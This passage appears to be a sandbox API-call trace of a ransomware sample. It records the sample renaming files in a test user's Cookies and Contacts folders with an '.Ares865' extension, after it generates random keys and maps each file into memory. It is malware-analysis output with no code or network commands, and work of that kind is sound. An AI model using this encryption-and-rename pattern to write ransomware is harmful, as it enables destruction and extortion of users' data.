GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=823) returned 1 [0107.734] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.735] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.735] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.735] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x640, lpName=0x0) returned 0x124 [0107.737] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x640) returned 0x190000 [0107.737] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.738] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.738] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.739] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.Ares865") returned 95 [0107.739] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.ares865"), dwFlags=0x1) returned 1 [0107.740] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.741] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=206) returned 1 [0107.741] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.741] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.742] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.742] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3d0, lpName=0x0) returned 0x124 [0107.744] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d0) returned 0x190000 [0107.745] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.746] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.746] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.746] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.Ares865") returned 94 [0107.746] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.748] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.749] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=108) returned 1 [0107.750] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.751] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.751] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.753] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.754] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.754] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.754] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.Ares865") returned 85 [0107.755] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.756] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.757] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=104) returned 1 [0107.757] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.758] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.758] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.760] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.761] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.761] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.761] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.Ares865") returned 90 [0107.761] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.ares865"), dwFlags=0x1) returned 1 [0107.763] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.763] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=178) returned 1 [0107.763] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.764] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.764] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.767] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.767] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.767] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.768] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.Ares865") returned 86 [0107.768] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.ares865"), dwFlags=0x1) returned 1 [0107.769] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.770] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=215) returned 1 [0107.770] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.770] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.770] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.774] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.775] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.775] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.776] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.Ares865") returned 90 [0107.776] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.777] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.777] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=169) returned 1 [0107.778] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.778] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.778] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.781] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.781] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.781] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.782] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt.Ares865") returned 85 [0107.782] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt.ares865"), dwFlags=0x1) returned 1 [0107.783] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.784] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1026) returned 1 [0107.784] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.785] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.785] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.787] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.788] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.788] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.789] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\index.dat.Ares865") returned 59 [0107.789] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\index.dat.ares865"), dwFlags=0x1) returned 1 [0107.790] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\index.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.791] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32768) returned 1 [0107.791] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.791] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.791] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.796] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.797] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.797] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.798] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0107.798] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.Ares865") returned 70 [0107.798] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.ares865"), dwFlags=0x1) returned 1 [0107.799] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.800] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1178) returned 1 [0107.800] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.800] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.800] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.807] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.808] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.808] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.809] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.Ares865") returned 68 [0107.809] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.ares865"), dwFlags=0x1) returned 1 [0107.810] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.810] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=68382) returned 1 [0107.810] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.811] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.811] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.821] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.822] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.822] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.823] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.Ares865") returned 68 [0107.823] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.ares865"), dwFlags=0x1) returned 1 [0107.825] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.825] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1171) returned 1 [0107.825] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.826] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.826] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.829] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.830] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.830] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.830] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.Ares865") returned 67 [0107.830] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.ares865"), dwFlags=0x1) returned 1 [0107.832] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.832] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1177) returned 1 [0107.832] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.833] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.833] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.838] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.839] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.839] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.839] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini.Ares865") returned 58 [0107.839] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js 